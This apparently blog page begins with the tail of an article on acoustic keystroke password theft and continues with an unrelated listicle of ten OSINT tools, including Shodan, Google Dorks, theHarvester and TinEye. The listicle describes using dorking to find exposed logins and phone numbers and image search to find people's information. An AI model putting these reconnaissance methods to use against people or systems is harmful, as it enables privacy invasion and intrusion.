If you can log in to your account using a face scan or fingerprint scan, you won’t have to worry about any entered passwords. You can also run white noise near your devices, this way any hacker recordings will be disabled.

Epilogue

So I have explained to you how Keystroke sounds can reveal passwords to hackers, they use AI to analyze keyboard sounds and steal users’ passwords. Therefore, you should not be subjective or negligent when using passwords, because hackers are always looking for ways to take advantage of vulnerabilities to steal their passwords. So do you take any measures to protect your password? Please share in the comments section below!

OSINT stands for “open source intelligence”, which is the activity of finding information that you can access through publicly available data sources on the Internet such as from Google, Bing or specialized search engines. Pentesters use OSINT to research targets or learn about cyber threats. OSINT is an important tool for both Red Team and Blue Team. So in this article, I will introduce you to the top 10 OSINT tools for hackers.

Top 10 OSINT Tools for Hackers

1. Shodan

Shodan is a search engine for open devices on the internet, such as servers and IoT devices. These are devices that are publicly accessible to you. If the device is connected to the internet without careful security configuration, it can be found through Shodan.

The free Shodan version will limit the number of results. So the paid version is much more useful if you need to find servers, networking devices, and IoT peripherals (such as cameras).

2. Maltego

Maltego available on Windows, Mac, and Linux, giving users access to multiple data sources for OSINT, data research, and digital forensics purposes. There are over 58 data sources in Maltego including Google Maps, AlienVault OTX, ATII Hades Darkweb Intelligence, Blockchain.info, Crowdstrike, VirusTotal, etc.

The value that Maltego brings to you lies not only in huge data sources, but also in data patterns and trends through visualization. Of course, all the features of Maltego are not free, but I think the Maltego Community Edition version is enough for newbies.

3. Google Dorks

Google Dork It’s not an app, it’s a technique using Google. Although it’s not an app, there are developers who have developed open source software tools for Google Dorking that you can try, such as Pagodo and GoogleDorker.

Most people just type keyword strings into Google, such as “Vietnam weather” or “anonyviet”. But there are some search operators that you can use in Google. For example, you can try “site:anonyviet.com” to search for content within the anonyviet website, or use quotes around a search term to only return results containing that exact word. You can see more list of operators of Google Dork here.

A lot of websites are configured with very poor security. Google’s crawling bots visit these sites in search of content. So Google Dorking can be a useful technique for you to find data like email addresses, login information and phone numbers that are not properly secured.

4. Recon-ng

Recon-ng is an open source web reconnaissance tool. Its strength lies in the fact that you can install additional modules into this tool. If you use Recon-ng efficiently, you can save a lot of time in your OSINT work.

Recon-ng can be run from the terminal. If you want to add more power to Recon-ng, select Marketplace from the main menu and install the modules you want.

5. Ahmia.fi

Ahmia.fi is a search engine dedicated to finding websites on the Tor Network, although the search engine itself is accessible on the “clearnet”. But you’ll need the Tor Browser to open your search results.

There are many black markets and forums on the Tor Network, so using Ahmia.fi effectively will help with your OSINT investigation.

6. Wayback Machine

The Wayback Machine is a search engine for over 632 billion web pages, many of which date back to the 1990s.

Archive.org is using the Wayback Machine to archive as many web pages as possible. You can also use their website to manually host websites that are currently online. If these sites are deleted or down, you can find a copy of them stored in the Wayback Machine.

7. theHarvester

theHarvester is another useful open source scouting tool that you can install from GitHub. It can be used to collect email addresses, servers, subdomains, employee names and ports from various public sources such as search engines, PGP and Shodan.

You can easily run theHarvester from your command line. This tool has a special set of options for you to explore the data in the DNS server. DNS servers have a lot of useful information because they associate domain names with specific IP addresses.

Some of the data sources you can explore with theHarvester include LinkedIn, Bing, Google, and VirusTotal.

8. TinEye

TinEye is a powerful tool for image analysis. If you have a photo on your device, you can upload it to TinEye and see if the photo is being used on another web.

Specific use cases: Find other people’s information from their photo, the location where the photo was taken, or the app used to take the photo.

9. OSINT Framework

OSINT Framework is the perfect web app if you’re not sure what OSINT data source you’ll need to use to find the information you want. The OSINT Framework provides you with potential data sources that you can use.

You can analyze malicious files, usernames, geolocations, IP addresses, domains, IRCs, Dark Web, big data, threat information, phone numbers or more with this tool. OSINT Framework can be the first step in your OSINT journey.

10. Library

The best offline data source is a library. You can visit the library, or the library’s website can help you directly find the information you are looking for.

There is a lot of information that has not been digitized at the library such as magazines, newspapers and directories. In Ho Chi Minh, you can go to the General Science library. Sign up for a membership card and you can spend the day in the library. I often come here to run the deadline again :v.